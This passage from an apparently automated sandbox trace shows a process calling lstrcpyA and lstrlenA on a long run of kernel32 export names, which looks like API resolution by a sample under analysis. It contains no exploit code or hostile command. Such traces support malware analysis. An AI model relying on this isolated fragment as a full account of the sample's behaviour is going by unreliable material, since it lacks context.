lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.707] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.707] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.707] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.707] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.707] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.707] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.707] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.707] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.707] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.707] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.707] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.707] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.707] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.707] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.708] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.708] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.708] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.708] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.708] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.708] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.708] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.708] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.708] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.708] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.708] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.708] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.708] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.708] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.708] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.708] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.708] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.708] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.708] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.708] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.709] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.709] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.709] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.709] lstrlenA (lpString="COPYFILEA") returned 9 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.709] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.709] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.709] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.709] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.709] lstrlenA (lpString="COPYFILEW") returned 9 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.709] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.709] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.709] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.709] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.709] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.709] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.709] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.709] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.709] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.709] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.710] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.710] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.710] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.710] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.710] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.710] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.710] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.710] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.710] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.710] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.710] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.710] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.710] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.710] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.710] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.710] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.710] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.710] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.710] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.711] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.711] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.711] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.711] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.711] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.711] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.711] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.711] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.711] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.711] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.711] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.711] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.711] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.711] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.711] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.711] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.711] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.711] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.711] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.712] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.712] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.712] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.712] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.712] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.712] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.712] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.712] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.712] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.712] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.712] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.712] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.712] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.712] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.712] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.712] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.712] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.712] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.713] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.713] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.713] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.713] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.713] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.713] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.713] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.713] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.713] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.713] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.713] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.713] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.713] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.713] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.713] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.713] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.713] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.713] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.713] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.714] lstrcpyA (in: lpString1=0x3f2d1ec, 